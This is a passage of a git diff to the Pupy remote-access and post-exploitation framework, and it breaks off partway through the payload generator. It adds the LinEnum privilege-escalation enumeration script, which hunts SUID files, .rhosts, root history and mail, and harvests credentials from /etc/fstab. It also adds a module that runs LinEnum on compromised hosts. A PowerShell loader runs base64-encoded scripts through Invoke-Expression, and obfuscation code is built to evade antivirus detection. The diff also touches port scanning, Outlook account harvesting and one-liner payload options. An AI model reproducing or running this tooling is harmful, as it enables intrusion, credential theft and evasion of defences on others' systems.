+findsuid=`find / -perm -4000 -type f 2>/dev/null`
+	if [ "$findsuid" ]; then
+		echo -e "\e[00;31mSUID files:\e[00m\n$findsuid" |tee -a $report 2>/dev/null
+		echo -e "\n" |tee -a $report 2>/dev/null
+	else 
+		:
+	fi
+  else
+	:
+fi
+
+if [ "$thorough" = "1" ]; then
+	if [ "$export" ] && [ "$findsuid" ]; then
+		mkdir $format/suid-files/ 2>/dev/null
+		for i in $findsuid; do cp $i $format/suid-files/; done 2>/dev/null
+	else 
+		:
+	fi
+  else
+	:
+fi
+
+#list of 'interesting' suid files - feel free to make additions
+if [ "$thorough" = "1" ]; then
+intsuid=`find / -perm -4000 -type f 2>/dev/null | grep -w 'nmap\|perl\|'awk'\|'find'\|'bash'\|'sh'\|'man'\|'more'\|'less'\|'vi'\|'vim'\|'nc'\|'netcat'\|python\|ruby\|lua\|irb\|pl' | xargs -r ls -la` 2>/dev/null
+	if [ "$intsuid" ]; then
+		echo -e "\e[00;33m***Possibly interesting SUID files:\e[00m\n$intsuid" |tee -a $report 2>/dev/null
+		echo -e "\n" |tee -a $report 2>/dev/null
+	else 
+		:
+	fi
+  else
+	:
+fi
+
+#lists word-writable suid files
+if [ "$thorough" = "1" ]; then
+wwsuid=`find / -perm -4007 -type f 2>/dev/null`
+	if [ "$wwsuid" ]; then
+		echo -e "\e[00;31mWorld-writable SUID files:\e[00m\n$wwsuid" |tee -a $report 2>/dev/null
+		echo -e "\n" |tee -a $report 2>/dev/null
+	else 
+		:
+	fi
+  else
+	:
+fi
+
+#lists world-writable suid files owned by root
+if [ "$thorough" = "1" ]; then
+wwsuidrt=`find / -uid 0 -perm -4007 -type f 2>/dev/null`
+	if [ "$wwsuidrt" ]; then
+		echo -e "\e[00;31mWorld-writable SUID files owned by root:\e[00m\n$wwsuidrt" |tee -a $report 2>/dev/null
+		echo -e "\n" |tee -a $report 2>/dev/null
+	else 
+		:
+	fi
+  else
+	:
+fi
+
+#search for guid files - this can take some time so is only 'activated' with thorough scanning switch (as are all guid scans below)
+if [ "$thorough" = "1" ]; then
+findguid=`find / -perm -2000 -type f 2>/dev/null`
+	if [ "$findguid" ]; then
+		echo -e "\e[00;31mGUID files:\e[00m\n$findguid" |tee -a $report 2>/dev/null
+		echo -e "\n" |tee -a $report 2>/dev/null
+	else 
+		:
+	fi
+  else
+	:
+fi
+
+if [ "$thorough" = "1" ]; then
+	if [ "$export" ] && [ "$findguid" ]; then
+		mkdir $format/guid-files/ 2>/dev/null
+		for i in $findguid; do cp $i $format/guid-files/; done 2>/dev/null
+	else 
+		:
+	fi
+  else
+	:
+fi
+
+#list of 'interesting' guid files - feel free to make additions
+if [ "$thorough" = "1" ]; then
+intguid=`find / -perm -2000 -type f 2>/dev/null | grep -w 'nmap\|perl\|'awk'\|'find'\|'bash'\|'sh'\|'man'\|'more'\|'less'\|'vi'\|'vim'\|'nc'\|'netcat'\|python\|ruby\|lua\|irb\|pl' | xargs -r ls -la`
+	if [ "$intguid" ]; then
+		echo -e "\e[00;33m***Possibly interesting GUID files:\e[00m\n$intguid" |tee -a $report 2>/dev/null
+		echo -e "\n" |tee -a $report 2>/dev/null
+	else 
+		:
+	fi
+  else
+	:
+fi
+
+#lists world-writable guid files
+if [ "$thorough" = "1" ]; then
+wwguid=`find / -perm -2007 -type f 2>/dev/null`
+	if [ "$wwguid" ]; then
+		echo -e "\e[00;31mWorld-writable GUID files:\e[00m\n$wwguid" |tee -a $report 2>/dev/null
+		echo -e "\n" |tee -a $report 2>/dev/null
+	else 
+		:
+	fi
+  else
+	:
+fi
+
+#lists world-writable guid files owned by root
+if [ "$thorough" = "1" ]; then
+wwguidrt=`find / -uid 0 -perm -2007 -type f 2>/dev/null`
+	if [ "$wwguidrt" ]; then
+		echo -e "\e[00;31mAWorld-writable GUID files owned by root:\e[00m\n$wwguidrt" |tee -a $report 2>/dev/null
+		echo -e "\n" |tee -a $report 2>/dev/null
+	else 
+		:
+	fi
+  else
+	:
+fi
+
+#list all world-writable files excluding /proc
+if [ "$thorough" = "1" ]; then
+wwfiles=`find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null`
+	if [ "$wwfiles" ]; then
+		echo -e "\e[00;31mWorld-writable files (excluding /proc):\e[00m\n$wwfiles" |tee -a $report 2>/dev/null
+		echo -e "\n" |tee -a $report 2>/dev/null
+	else 
+		:
+	fi
+  else
+	:
+fi
+
+if [ "$thorough" = "1" ]; then
+	if [ "$export" ] && [ "$wwfiles" ]; then
+		mkdir $format/ww-files/ 2>/dev/null
+		for i in $wwfiles; do cp --parents $i $format/ww-files/; done 2>/dev/null
+	else 
+		:
+	fi
+  else
+	:
+fi
+
+#are any .plan files accessible in /home (could contain useful information)
+usrplan=`find /home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;`
+if [ "$usrplan" ]; then
+  echo -e "\e[00;31mPlan file permissions and contents:\e[00m\n$usrplan" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+if [ "$export" ] && [ "$usrplan" ]; then
+  mkdir $format/plan_files/ 2>/dev/null
+  for i in $usrplan; do cp --parents $i $format/plan_files/; done 2>/dev/null
+else 
+  :
+fi
+
+bsdusrplan=`find /usr/home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;`
+if [ "$bsdusrplan" ]; then
+  echo -e "\e[00;31mPlan file permissions and contents:\e[00m\n$bsdusrplan" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+if [ "$export" ] && [ "$bsdusrplan" ]; then
+  mkdir $format/plan_files/ 2>/dev/null
+  for i in $bsdusrplan; do cp --parents $i $format/plan_files/; done 2>/dev/null
+else 
+  :
+fi
+
+#are there any .rhosts files accessible - these may allow us to login as another user etc.
+rhostsusr=`find /home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;`
+if [ "$rhostsusr" ]; then
+  echo -e "\e[00;31mrhost config file(s) and file contents:\e[00m\n$rhostsusr" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+if [ "$export" ] && [ "$rhostsusr" ]; then
+  mkdir $format/rhosts/ 2>/dev/null
+  for i in $rhostsusr; do cp --parents $i $format/rhosts/; done 2>/dev/null
+else 
+  :
+fi
+
+bsdrhostsusr=`find /usr/home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;`
+if [ "$bsdrhostsusr" ]; then
+  echo -e "\e[00;31mrhost config file(s) and file contents:\e[00m\n$bsdrhostsusr" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+if [ "$export" ] && [ "$bsdrhostsusr" ]; then
+  mkdir $format/rhosts 2>/dev/null
+  for i in $bsdrhostsusr; do cp --parents $i $format/rhosts/; done 2>/dev/null
+else 
+  :
+fi
+
+rhostssys=`find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;`
+if [ "$rhostssys" ]; then
+  echo -e "\e[00;31mHosts.equiv file details and file contents: \e[00m\n$rhostssys" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+  else 
+  :
+fi
+
+if [ "$export" ] && [ "$rhostssys" ]; then
+  mkdir $format/rhosts/ 2>/dev/null
+  for i in $rhostssys; do cp --parents $i $format/rhosts/; done 2>/dev/null
+else 
+  :
+fi
+
+#list nfs shares/permisisons etc.
+nfsexports=`ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null`
+if [ "$nfsexports" ]; then
+  echo -e "\e[00;31mNFS config details: \e[00m\n$nfsexports" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+  else 
+  :
+fi
+
+if [ "$export" ] && [ "$nfsexports" ]; then
+  mkdir $format/etc-export/ 2>/dev/null
+  cp /etc/exports $format/etc-export/exports 2>/dev/null
+else 
+  :
+fi
+
+#looking for credentials in /etc/fstab
+fstab=`cat /etc/fstab 2>/dev/null |grep username |awk '{sub(/.*\username=/,"");sub(/\,.*/,"")}1'| xargs -r echo username:; cat /etc/fstab 2>/dev/null |grep password |awk '{sub(/.*\password=/,"");sub(/\,.*/,"")}1'| xargs -r echo password:; cat /etc/fstab 2>/dev/null |grep domain |awk '{sub(/.*\domain=/,"");sub(/\,.*/,"")}1'| xargs -r echo domain:`
+if [ "$fstab" ]; then
+  echo -e "\e[00;33m***Looks like there are credentials in /etc/fstab!\e[00m\n$fstab" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+  else 
+  :
+fi
+
+if [ "$export" ] && [ "$fstab" ]; then
+  mkdir $format/etc-exports/ 2>/dev/null
+  cp /etc/fstab $format/etc-exports/fstab done 2>/dev/null
+else 
+  :
+fi
+
+fstabcred=`cat /etc/fstab 2>/dev/null |grep cred |awk '{sub(/.*\credentials=/,"");sub(/\,.*/,"")}1'| xargs -I{} sh -c 'ls -la {}; cat {}'`
+if [ "$fstabcred" ]; then
+    echo -e "\e[00;33m***/etc/fstab contains a credentials file!\e[00m\n$fstabcred" |tee -a $report 2>/dev/null
+    echo -e "\n" |tee -a $report 2>/dev/null
+    else
+    :
+fi
+
+if [ "$export" ] && [ "$fstabcred" ]; then
+  mkdir $format/etc-exports/ 2>/dev/null
+  cp /etc/fstab $format/etc-exports/fstab done 2>/dev/null
+else 
+  :
+fi
+
+#use supplied keyword and cat *.conf files for potential matches - output will show line number within relevant file path where a match has been located
+if [ "$keyword" = "" ]; then
+  echo -e "Can't search *.conf files as no keyword was entered\n" |tee -a $report 2>/dev/null
+  else
+    confkey=`find / -maxdepth 4 -name *.conf -type f -exec grep -Hn $keyword {} \; 2>/dev/null`
+    if [ "$confkey" ]; then
+      echo -e "\e[00;31mFind keyword ($keyword) in .conf files (recursive 4 levels - output format filepath:identified line number where keyword appears):\e[00m\n$confkey" |tee -a $report 2>/dev/null
+      echo -e "\n" |tee -a $report 2>/dev/null
+     else 
+	echo -e "\e[00;31mFind keyword ($keyword) in .conf files (recursive 4 levels):\e[00m" |tee -a $report 2>/dev/null
+	echo -e "'$keyword' not found in any .conf files" |tee -a $report 2>/dev/null
+	echo -e "\n" |tee -a $report 2>/dev/null
+    fi
+fi
+
+if [ "$keyword" = "" ]; then
+  :
+  else
+    if [ "$export" ] && [ "$confkey" ]; then
+	  confkeyfile=`find / -maxdepth 4 -name *.conf -type f -exec grep -lHn $keyword {} \; 2>/dev/null`
+      mkdir --parents $format/keyword_file_matches/config_files/ 2>/dev/null
+      for i in $confkeyfile; do cp --parents $i $format/keyword_file_matches/config_files/ ; done 2>/dev/null
+    else 
+      :
+  fi
+fi
+
+#use supplied keyword and cat *.log files for potential matches - output will show line number within relevant file path where a match has been located
+if [ "$keyword" = "" ];then
+  echo -e "Can't search *.log files as no keyword was entered\n" |tee -a $report 2>/dev/null
+  else
+    logkey=`find / -name *.log -type f -exec grep -Hn $keyword {} \; 2>/dev/null`
+    if [ "$logkey" ]; then
+      echo -e "\e[00;31mFind keyword ($keyword) in .log files (output format filepath:identified line number where keyword appears):\e[00m\n$logkey" |tee -a $report 2>/dev/null
+      echo -e "\n" |tee -a $report 2>/dev/null
+     else 
+	echo -e "\e[00;31mFind keyword ($keyword) in .log files (recursive 2 levels):\e[00m" |tee -a $report 2>/dev/null
+	echo -e "'$keyword' not found in any .log files"
+	echo -e "\n" |tee -a $report 2>/dev/null
+    fi
+fi
+
+if [ "$keyword" = "" ];then
+  :
+  else
+    if [ "$export" ] && [ "$logkey" ]; then
+      logkeyfile=`find / -name *.log -type f -exec grep -lHn $keyword {} \; 2>/dev/null`
+	  mkdir --parents $format/keyword_file_matches/log_files/ 2>/dev/null
+      for i in $logkeyfile; do cp --parents $i $format/keyword_file_matches/log_files/ ; done 2>/dev/null
+    else 
+      :
+  fi
+fi
+
+#use supplied keyword and cat *.ini files for potential matches - output will show line number within relevant file path where a match has been located
+if [ "$keyword" = "" ];then
+  echo -e "Can't search *.ini files as no keyword was entered\n" |tee -a $report 2>/dev/null
+  else
+    inikey=`find / -maxdepth 4 -name *.ini -type f -exec grep -Hn $keyword {} \; 2>/dev/null`
+    if [ "$inikey" ]; then
+      echo -e "\e[00;31mFind keyword ($keyword) in .ini files (recursive 4 levels - output format filepath:identified line number where keyword appears):\e[00m\n$inikey" |tee -a $report 2>/dev/null
+      echo -e "\n" |tee -a $report 2>/dev/null
+     else 
+	echo -e "\e[00;31mFind keyword ($keyword) in .ini files (recursive 2 levels):\e[00m" |tee -a $report 2>/dev/null
+	echo -e "'$keyword' not found in any .ini files" |tee -a $report 2>/dev/null
+	echo -e "\n"
+    fi
+fi
+
+if [ "$keyword" = "" ];then
+  :
+  else
+    if [ "$export" ] && [ "$inikey" ]; then
+	  inikey=`find / -maxdepth 4 -name *.ini -type f -exec grep -lHn $keyword {} \; 2>/dev/null`
+      mkdir --parents $format/keyword_file_matches/ini_files/ 2>/dev/null
+      for i in $inikey; do cp --parents $i $format/keyword_file_matches/ini_files/ ; done 2>/dev/null
+    else 
+      :
+  fi
+fi
+
+#quick extract of .conf files from /etc - only 1 level
+allconf=`find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} \; 2>/dev/null`
+if [ "$allconf" ]; then
+  echo -e "\e[00;31mAll *.conf files in /etc (recursive 1 level):\e[00m\n$allconf" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+if [ "$export" ] && [ "$allconf" ]; then
+  mkdir $format/conf-files/ 2>/dev/null
+  for i in $allconf; do cp --parents $i $format/conf-files/; done 2>/dev/null
+else 
+  :
+fi
+
+#extract any user history files that are accessible
+usrhist=`ls -la ~/.*_history 2>/dev/null`
+if [ "$usrhist" ]; then
+  echo -e "\e[00;31mCurrent user's history files:\e[00m\n$usrhist" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+if [ "$export" ] && [ "$usrhist" ]; then
+  mkdir $format/history_files/ 2>/dev/null
+  for i in $usrhist; do cp --parents $i $format/history_files/; done 2>/dev/null
+ else 
+  :
+fi
+
+#can we read roots *_history files - could be passwords stored etc.
+roothist=`ls -la /root/.*_history 2>/dev/null`
+if [ "$roothist" ]; then
+  echo -e "\e[00;33m***Root's history files are accessible!\e[00m\n$roothist" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+if [ "$export" ] && [ "$roothist" ]; then
+  mkdir $format/history_files/ 2>/dev/null
+  cp $roothist $format/history_files/ 2>/dev/null
+else 
+  :
+fi
+
+#is there any mail accessible
+readmail=`ls -la /var/mail 2>/dev/null`
+if [ "$readmail" ]; then
+  echo -e "\e[00;31mAny interesting mail in /var/mail:\e[00m\n$readmail" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+#can we read roots mail
+readmailroot=`head /var/mail/root 2>/dev/null`
+if [ "$readmailroot" ]; then
+  echo -e "\e[00;33m***We can read /var/mail/root! (snippet below)\e[00m\n$readmailroot" |tee -a $report 2>/dev/null
+  echo -e "\n" |tee -a $report 2>/dev/null
+else 
+  :
+fi
+
+if [ "$export" ] && [ "$readmailroot" ]; then
+  mkdir $format/mail-from-root/ 2>/dev/null
+  cp $readmailroot $format/mail-from-root/ 2>/dev/null
+else 
+  :
+fi
+
+echo -e "\e[00;33m### SCAN COMPLETE ####################################\e[00m" |tee -a $report 2>/dev/null
+
+#EndOfScript

--- a/pupy/modules/get_info.py
+++ b/pupy/modules/get_info.py
@@ -6,7 +6,7 @@ __class_name__="GetInfo"
 @config(cat="gather")
 class GetInfo(PupyModule):
     """ get some informations about one or multiple clients """
-    dependencies=["psutil", "pupwinutils.security"]
+    dependencies=["psutil"]
     def init_argparse(self):
         self.arg_parser = PupyArgumentParser(prog='get_info', description=self.__doc__)
         #self.arg_parser.add_argument('arguments', nargs='+', metavar='<command>')
@@ -20,6 +20,7 @@ class GetInfo(PupyModule):
         for k in commonKeys:
             infos+="{:<10}: {}\n".format(k,self.client.desc[k])
         if self.client.is_windows():
+            self.client.load_package("pupwinutils.security")
             for k in windKeys:
                 infos+="{:<10}: {}\n".format(k,self.client.desc[k])
             currentUserIsLocalAdmin = self.client.conn.modules["pupwinutils.security"].can_get_admin_access()

--- a/pupy/modules/lib/windows/powershell_upload.py
+++ b/pupy/modules/lib/windows/powershell_upload.py
@@ -1,32 +1,50 @@
 # -*- coding: UTF8 -*-
-
 from rpyc.utils.classic import upload
 import base64, re, subprocess
 from subprocess import PIPE, Popen
 
-def execute_powershell_script(module, content, function, x64IfPossible=False):
+def execute_powershell_script(module, content, function, x64IfPossible=False, script_name=None):
     '''
     To get function output, Write-Output should be used (stdout output). 
     If you use Write-Verbose in your code for example, the output will be not captured because the output is not done over stdout (with Write-Verbose)
     '''
+    # content = re.sub("Write-Verbose ","Write-Output ", content, flags=re.I) # could break the output with mimikatz
+    content = re.sub("Write-Error ","Write-Output ", content, flags=re.I)
+    content = re.sub("Write-Warning ","Write-Output ", content, flags=re.I)
+
     path="powershell.exe"
+    arch = 'x64'
     if x64IfPossible:
         if "64" in module.client.desc['os_arch'] and "32" in module.client.desc['proc_arch']:
-            path=r"C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe"
-    fullargs=[path, "-C", "-"]
+            path=r"C:\\Windows\\SysNative\\WindowsPowerShell\\v1.0\\powershell.exe"
+    elif "32" in module.client.desc['proc_arch']:
+        arch = 'x86'
     
-    p = module.client.conn.modules.subprocess.Popen(fullargs, stdout=PIPE, stderr=PIPE, stdin=PIPE, bufsize=0, universal_newlines=True, shell=True)
-    p.stdin.write("$base64=\"\""+"\n")
-    n = 20000
-    line = base64.b64encode(content)
-    tab = [line[i:i+n] for i in range(0, len(line), n)]
-    for t in tab:
-        p.stdin.write("$base64+=\"%s\"\n" % t)
-        p.stdin.flush()   
+    fullargs=[path, "-C", "-"]
 
-    p.stdin.write("$d=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64))\n")
-    p.stdin.write("Invoke-Expression $d\n")
-    p.stdin.write("$a=Invoke-Expression \"%s\" | Format-Table -HideTableHeaders | Out-String\n" % function)
+    # create and store the powershell object if it not exists
+    if not module.client.powershell[arch]['object']:
+        p = module.client.conn.modules.subprocess.Popen(fullargs, stdout=PIPE, stderr=PIPE, stdin=PIPE, bufsize=0, universal_newlines=True, shell=True)
+        module.client.powershell[arch]['object'] = p
+    else:
+        p = module.client.powershell[arch]['object']
+
+    if script_name not in module.client.powershell[arch]['scripts_loaded']:
+        module.client.powershell[arch]['scripts_loaded'].append(script_name)
+        p.stdin.write("$base64=\"\""+"\n")
+        n = 20000
+        line = base64.b64encode(content)
+        tab = [line[i:i+n] for i in range(0, len(line), n)]
+        for t in tab:
+            p.stdin.write("$base64+=\"%s\"\n" % t)
+            p.stdin.flush()
+
+        p.stdin.write("$d=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64))\n")
+        p.stdin.write("Invoke-Expression $d\n")
+    
+    # else: the powershell script is already loaded, call the function wanted
+
+    p.stdin.write("\n$a=Invoke-Expression \"%s\" | Format-Table | Out-String\n" % function)
     p.stdin.write("$b=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\"$a\"))\n")
     p.stdin.write("Write-Host $b\n")
 
@@ -35,7 +53,6 @@ def execute_powershell_script(module, content, function, x64IfPossible=False):
     for i in p.stdout.readline():
         output += i
     output = base64.b64decode(output)
-    p.stdin.write("exit\n")
     return output
 
 def remove_comments(string):
@@ -68,3 +85,14 @@ def obfuscatePowershellScript(code):
     if "function Invoke-ReflectivePEInjection" in newCode:
         newCode = newCode.replace("$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null", "$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERIS'+'TICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null")
     return newCode
+    
+def obfs_ps_script(script):
+    """
+    Strip block comments, line comments, empty lines, verbose statements,
+    and debug statements from a PowerShell source file.
+    """
+    # strip block comments
+    strippedCode = re.sub(re.compile('<#.*?#>', re.DOTALL), '', script)
+    # strip blank lines, lines starting with #, and verbose/debug statements
+    strippedCode = "\n".join([line for line in strippedCode.split('\n') if ((line.strip() != '') and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")) )])
+    return strippedCode

--- a/pupy/modules/port_scan.py
+++ b/pupy/modules/port_scan.py
@@ -7,17 +7,18 @@ __class_name__="PortScan"
 @config(cat="network")
 class PortScan(PupyModule):
     """ run a TCP port scan """
-    dependencies=['portscan', 'scapy']
+    dependencies=['gzip','portscan', 'scapy']
 
     def init_argparse(self):
         self.arg_parser = PupyArgumentParser(prog="port_scan", description=self.__doc__)
         self.arg_parser.add_argument('--ports','-p', default="21,22,23,80,139,443,445,3389,8000,8080",  help='ports to scan ex: 22,80,443')
-        self.arg_parser.add_argument('address', metavar="ip/range", help='IP/range to scan')
+        self.arg_parser.add_argument('--timeout','-t', default="2",  help='timeout (default: %(default)s)')
+        self.arg_parser.add_argument('address', metavar="ip/range", help='IP/range')
 
     def run(self, args):
         ps=self.client.conn.modules['portscan'].PortScanner()
         ports=[int(x) for x in args.ports.split(',')]
-        res=ps.scan(args.address, ports)
+        res=ps.scan(args.address, ports, timeout=float(args.timeout))
         self.rawlog(res)
         self.success("Scan finished !")
 

--- a/pupy/modules/privesc_checker.py
+++ b/pupy/modules/privesc_checker.py
@@ -1,0 +1,52 @@
+# -*- coding: UTF8 -*-
+from pupylib.PupyModule import *
+import os
+import subprocess
+
+__class_name__="PrivEsc_Checker"
+ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
+
+@config(compat="linux", category="privesc")
+class PrivEsc_Checker(PupyModule):
+    """ Linux Privilege Escalation Scripts """
+    
+    def init_argparse(self):
+        self.arg_parser = PupyArgumentParser(prog="PrivEsc_Checker", description=self.__doc__)
+        self.arg_parser.add_argument("--linenum", dest='linenum', action='store_true', help="Run Linenum sh script (https://github.com/rebootuser/LinEnum)")
+        self.arg_parser.add_argument("--thorough-tests", dest='thoroughtests', action='store_true', help="Run script with all options (can take time)")
+        self.arg_parser.add_argument("--output-file", dest='outputfile', default=None, help="Store results in this file")
+        self.arg_parser.add_argument("--shell", dest='shell', default="/bin/bash", help="Shell to use when it is a .sh script")
+
+    def run(self, args):
+        if args.linenum == True:
+            self.success("Running Lineum sh script on the target with the {0} shell on the target...".format(args.shell))
+            if self.client.conn.modules.os.path.isfile(args.shell) == False:
+                self.error("{0} does not exist on the target's system!".format(args.shell))
+                self.error("You have to choose a valid shell")
+                return -1
+            code = open(os.path.join(ROOT, "external", "linenum", "linenum.sh"), 'r').read()
+            #output = self.client.conn.modules.subprocess.check_output(code, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
+            if args.thoroughtests == True:
+                self.success("Thorough tests enabled! Can take time...")
+                code = "thorough=1;\n"+code
+            self.success("Lineum script started...")
+            p = self.client.conn.modules.subprocess.Popen(code, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True, executable=args.shell)
+            output, err = p.communicate()
+            self.success("Lineum script finished")
+            if args.outputfile != None:
+                self.writeInFile(args.outputfile, output)
+                self.success("You can use the following command on Linux for reading this file: less -r {0}".format(args.outputfile))
+            else:
+                self.success("Results of the Lineum script:")
+                print output
+        else:
+             self.error("You have to choose a script")
+             return -1
+             
+    def writeInFile(self,filename, data):
+        '''
+        '''
+        self.success("Results are written in the file {0}".format(filename))
+        f = open(filename, 'w')
+        f.write(data)
+        f.close()

--- a/pupy/packages/all/portscan.py
+++ b/pupy/packages/all/portscan.py
@@ -18,12 +18,10 @@ class PortScanner(object):
         pass
     def scan(self, address, ports, timeout=4, iface=None):
         res=""
+        '''
         ans,unans=sr(IP(dst=address)/TCP(flags="S",dport=list(ports)), verbose=False, iface=iface, timeout=timeout)
         for req,resp in ans:
             res+=format_response(resp)
         return res
-if __name__=='__main__':
-    p=PortScanner()
-    print p.scan("192.168.2.133",[443,80,22])
-
+        '''
                 

--- a/pupy/packages/windows/all/outlook.py
+++ b/pupy/packages/windows/all/outlook.py
@@ -69,21 +69,60 @@ class outlook():
 		Returns Dictionnary
 		'''
 		info = OrderedDict()
-		info['CurrentProfileName']=self.mapi.CurrentProfileName
+		try:
+			info['CurrentProfileName']=self.mapi.CurrentProfileName
+		except Exception,e:
+				logging.debug("Impossible to get CurrentProfileName configuration: {0}".format(e))
+				info['CurrentProfileName']=""
 		#info['CurrentUserAddress']=repr(self.mapi.CurrentUser) #Needs to be authenticiated to remote mail server. Otherwise, infinite timeout
-		info['SessionType']=self.outlook.Session.Type
+		try:
+			info['SessionType']=self.outlook.Session.Type
+		except Exception,e:
+			logging.debug("Impossible to get SessionType configuration: {0}".format(e))
+			info['SessionType']=""
 		for i, anAccount in enumerate(self.outlook.Session.Accounts):
-			info['Account{0}-DisplayName'.format(i)]=anAccount.DisplayName
-			info['Account{0}-SmtpAddress'.format(i)]=anAccount.SmtpAddress
-			info['Account{0}-AutoDiscoverXml'.format(i)]=anAccount.AutoDiscoverXml
-			info['Account{0}-AccountType'.format(i)]=self.OL_ACCOUNT_TYPES[anAccount.AccountType]
+			try:
+				info['Account{0}-DisplayName'.format(i)]=anAccount.DisplayName
+			except Exception,e:
+				logging.debug("Impossible to get DisplayName configuration: {0}".format(e))
+				info['Account{0}-DisplayName'.format(i)]=""
+			try:
+				info['Account{0}-SmtpAddress'.format(i)]=anAccount.SmtpAddress
+			except Exception,e:
+				logging.debug("Impossible to get SmtpAddress configuration: {0}".format(e))
+				info['Account{0}-SmtpAddress'.format(i)]=""
+			try: 
+				info['Account{0}-AutoDiscoverXml'.format(i)]=anAccount.AutoDiscoverXml
+			except Exception,e:
+				logging.debug("Impossible to get AutoDiscoverXml configuration: {0}".format(e))
+				info['Account{0}-AutoDiscoverXml'.format(i)]=""
+			try: 
+				info['Account{0}-AccountType'.format(i)]=self.OL_ACCOUNT_TYPES[anAccount.AccountType]
+			except Exception,e:
+				logging.debug("Impossible to get AccountType configuration: {0}".format(e))
+				info['Account{0}-AccountType'.format(i)]=""
 			#info['Account{0}-UserName'.format(i)]=anAccount.UserName #Needs to be authenticiated to remote mail server. Otherwise, infinite timeout
-		info['ExchangeMailboxServerName']=self.mapi.ExchangeMailboxServerName #Returns a String value that represents the name of the Exchange server that hosts the primary Exchange account mailbox.
-		info['ExchangeMailboxServerVersion']=self.mapi.ExchangeMailboxServerVersion #Returns a String value that represents the full version number of the Exchange server that hosts the primary Exchange account mailbox.
-		info['Offline']=self.mapi.Offline #Returns a Boolean indicating True if Outlook is offline (not connected to an Exchange server), and False if online (connected to an Exchange server)
-		info['ExchangeConnectionMode']=self.OL_EXCHANGE_CONNECTION_MODE[self.mapi.ExchangeConnectionMode]
-		self.mapi.SendAndReceive(True)
-		print repr(self.mapi)
+		try:
+			info['ExchangeMailboxServerName']=self.mapi.ExchangeMailboxServerName #Returns a String value that represents the name of the Exchange server that hosts the primary Exchange account mailbox.
+		except Exception,e:
+				logging.debug("Impossible to get ExchangeMailboxServerName configuration: {0}".format(e))
+				info['ExchangeMailboxServerName'.format(i)]=""
+		try:
+			info['ExchangeMailboxServerVersion']=self.mapi.ExchangeMailboxServerVersion #Returns a String value that represents the full version number of the Exchange server that hosts the primary Exchange account mailbox.
+		except Exception,e:
+				logging.debug("Impossible to get ExchangeMailboxServerVersion configuration: {0}".format(e))
+				info['ExchangeMailboxServerVersion'.format(i)]=""
+		try:
+			info['Offline']=self.mapi.Offline #Returns a Boolean indicating True if Outlook is offline (not connected to an Exchange server), and False if online (connected to an Exchange server)
+		except Exception,e:
+				logging.debug("Impossible to get Offline configuration: {0}".format(e))
+				info['Offline'.format(i)]=""
+		try:
+			info['ExchangeConnectionMode']=self.OL_EXCHANGE_CONNECTION_MODE[self.mapi.ExchangeConnectionMode]
+			self.mapi.SendAndReceive(True)
+		except Exception,e:
+				logging.debug("Impossible to get ExchangeConnectionMode configuration: {0}".format(e))
+				info['ExchangeConnectionMode']=None
 		return info
 		
 		

--- a/pupy/pupygen.py
+++ b/pupy/pupygen.py
@@ -291,6 +291,8 @@ if __name__=="__main__":
     parser.add_argument('-s', '--scriptlet', default=[], action='append', help="offline python scriptlets to execute before starting the connection. Multiple scriptlets can be privided.")
     parser.add_argument('-l', '--list', action=ListOptions, nargs=0, help="list available formats, transports, scriptlets and options")
     parser.add_argument('-i', '--interface', default=None, help="The default interface to listen on")
+    parser.add_argument('--no-use-proxy', action='store_true', help="Don't use the target's proxy configuration even if it is used by target (for ps1_oneliner only for now)")
+    parser.add_argument('--ps1-oneliner-listen-port', default=8080, type=int, help="Port used by ps1_oneliner listener (default: %(default)s)")
     parser.add_argument('--randomize-hash', action='store_true', help="add a random string in the exe to make it's hash unknown")
     parser.add_argument('--debug-scriptlets', action='store_true', help="don't catch scriptlets exceptions on the client for debug purposes")
     parser.add_argument('--workdir', help='Set Workdir (Default = current workdir)')
@@ -435,9 +437,11 @@ if __name__=="__main__":
             w.write("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1], x64InitCode, x64ConcatCode[:-1]) ))
     elif args.format=="ps1_oneliner":
         from pupylib.payloads.ps1_oneliner import serve_ps1_payload
-        i=conf["launcher_args"].index("--host")+1
